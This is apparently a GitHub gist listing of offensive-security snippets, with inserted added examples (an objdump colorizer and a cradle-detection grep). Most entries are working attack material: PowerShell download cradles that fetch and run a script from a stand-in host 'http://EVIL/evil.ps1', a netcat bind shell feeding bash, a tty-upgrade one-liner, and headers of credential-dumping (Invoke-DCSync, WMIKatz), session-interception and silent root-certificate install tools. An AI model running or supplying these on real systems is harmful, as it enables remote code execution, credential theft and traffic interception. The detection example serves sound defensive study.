👾
danger code

Dan Borges ahhh

@ahhh
ahhh / go-objdump.sh
Last active July 10, 2018 19:02
colorized go-objdump
#!/bin/bash
# go-objdump colorizes and reformats output of `go tool objdump`
# - it inserts an empty line after unconditional control-flow modifying instructions (JMP, RET, UD2)
# - it colors calls/returns in green
# - it colors traps (UD2) in red
# - it colors jumps (both conditional and unconditional) in blue
# - it colors padding/nops in violet
# - it colors the function name in yellow
# - it unindents the function body
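The gist body is truncated above, so here is an added example (not ahhh's script) that implements the behaviours the header comments list with a single awk pass: function name in yellow, CALL/RET green, UD2 red, J* jumps blue, padding violet, body unindented, and a blank line after JMP/RET/UD2. It assumes amd64 `go tool objdump` output (tab-separated `file:line`, address, hex, instruction columns) and treats `NOP*` and `INT $0x3` as padding; the sample input in the usage note is constructed.

```shell
#!/usr/bin/env bash
# Added example: colorize and reformat `go tool objdump` output read on stdin.
# Assumption: amd64 mnemonics (every J* mnemonic is a jump; NOP*/INT $0x3 is padding).
colorize_go_objdump() {
  awk '
  BEGIN {
    esc = "\033"
    green = esc "[32m"; red = esc "[31m"; blue = esc "[34m"
    violet = esc "[35m"; yellow = esc "[33m"; reset = esc "[0m"
  }
  # Function header: "TEXT main.main(SB) /path/to/file.go" -> colour only the symbol
  /^TEXT / {
    match($0, /^TEXT [^ ]+/)
    name = substr($0, 6, RLENGTH - 5)
    print "TEXT " yellow name reset substr($0, RLENGTH + 1)
    next
  }
  # Instruction line: "  file.go:N<tab><tab>ADDR<tab><tab>HEX<tab><tab>MNEMONIC OPERANDS"
  {
    sub(/^[ \t]+/, "")                      # unindent the function body
    n = split($0, f, "\t")
    instr = f[n]                            # last column: mnemonic plus operands
    prefix = substr($0, 1, length($0) - length(instr))
    split(instr, w, " ")
    m = w[1]                                # bare mnemonic
    color = ""
    if (m == "CALL" || m == "RET")                 color = green
    else if (m == "UD2")                           color = red
    else if (m ~ /^J/)                             color = blue    # JMP and conditional jumps
    else if (m ~ /^NOP/ || instr == "INT $0x3")    color = violet  # alignment padding
    if (color != "") instr = color instr reset
    print prefix instr
    # unconditional control-flow change: visually end the basic block
    if (m == "JMP" || m == "RET" || m == "UD2") print ""
  }'
}
```

Usage: `go tool objdump -s main.main ./binary | colorize_go_objdump | less -R`. The `-R` is needed so `less` passes the ANSI sequences through instead of escaping them.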
@ahhh
ahhh / upgrade to tty
Created June 22, 2018 16:45
upgrade to tty
# Spawn /bin/bash inside a pseudo-terminal so a raw nc/bind/reverse shell gets a real tty
# (job control, line editing, and programs such as su/ssh that refuse to run without one).
python -c 'import pty; pty.spawn("/bin/bash")'
@ahhh
ahhh / gist:efc2814fadba4d684c73ba6f09852df6
Created April 28, 2018 09:57
WMIKatz - Are you afraid
This file has been truncated, but you can view the full file.
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
@ahhh
ahhh / Invoke-DCSync.ps1
Created March 20, 2018 22:05 — forked from HarmJ0y/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Invoke-ReflectivePEInjection
@ahhh
ahhh / Get-InjectedThread.ps1
Created February 9, 2018 17:37 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@ahhh
ahhh / InterceptorThing.ps1
Created January 31, 2018 05:16
Interceptor - Normal User No Admin Required.
<#
.SYNOPSIS
This script demonstrates the ability to capture and tamper with Web sessions.
For secure sessions, this is done by dynamically writing certificates to match the requested domain.
This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.
Function: Interceptor
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
#include "stdafx.h"
#include <Windows.h>
#include <iostream>
#include <cstdio>   // printf
// Walk from a module's base address (HMODULE == image base == IMAGE_DOS_HEADER) to its NT headers.
void WipePEHeader(HANDLE GetModuleBase)
{
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)GetModuleBase;
// e_lfanew is the offset of the PE signature / IMAGE_NT_HEADERS from the image base
PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + (DWORD)pDosHeader->e_lfanew);
printf("NT Header at : %p\n", pNTHeader);
@ahhh
ahhh / script.ps1
Created January 24, 2018 06:59
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
# Verify the test root is not already present in the user's Trusted Root store
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
# Import-Certificate into CurrentUser\Root: Windows shows a security-warning MessageBox here,
# which is the prompt the hook in this gist's title suppresses
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
# Removal from CurrentUser\Root is prompted as well
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
@ahhh
ahhh / DownloadCradles.ps1
Last active January 18, 2018 02:53 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
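Each cradle above pairs an invoke (`IEX`) with a fetch primitive (`Net.WebClient`, `iwr`, the hidden `InternetExplorer.Application` object, `Msxml2.XMLHTTP`), and those tokens are what shows up in PowerShell script-block logging (Event ID 4104). The following added example (not from the gist or its fork source) greps exported script-block text for that pairing; the log lines are constructed, and the assumption is one script block per line of plain text. It will not catch cradles whose strings are concatenated or encoded at runtime; those need the decoded script-block content or AMSI telemetry.

```shell
#!/usr/bin/env bash
# Added example: flag download cradles in exported PowerShell script-block text.
# Assumption (constructed input): one ScriptBlockText per line, already decoded.
# Fetch primitives taken from the cradles listed in the gist above.
cradle_regex='(DownloadString|DownloadFile|Invoke-WebRequest|[^A-Za-z]iwr[^A-Za-z]|Net\.WebClient|InternetExplorer\.Application|Msxml2\.XMLHTTP|WinHttp\.WinHttpRequest)'

# Print only lines that both evaluate code (IEX / Invoke-Expression) and fetch it remotely;
# a plain Invoke-WebRequest to a file on its own is not flagged.
find_cradles() {
  grep -iE 'IEX|Invoke-Expression' | grep -iE "$cradle_regex"
}

# Constructed sample of script-block log lines: three cradles, two benign commands.
sample_logs() {
  cat <<'EOF'
Get-ChildItem C:\Users | Select-Object Name
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
IEX (iwr 'http://EVIL/evil.ps1')
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
Invoke-WebRequest https://example.invalid/report.json -OutFile C:\temp\r.json
EOF
}

# Usage: sample_logs | find_cradles   (or: cat exported_4104.txt | find_cradles)
```

The two-stage grep keeps the rule readable: the first stage is the execution sink, the second the network source, and either can be extended without touching the other.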
@ahhh
ahhh / simple_bind.sh
Created January 2, 2018 23:11
simple bind shell as a shell script
# Re-listen after every client disconnect (nc exits when the connection closes)
while true ; do
# Client input is piped into bash, but bash's output has no path back to the client,
# so commands run blind. A two-way shell needs a FIFO between nc and bash, or an nc build
# with -e. Note: OpenBSD/BSD nc takes "-l 31337"; traditional/GNU nc needs "-l -p 31337".
nc -l 31337 | /bin/bash
done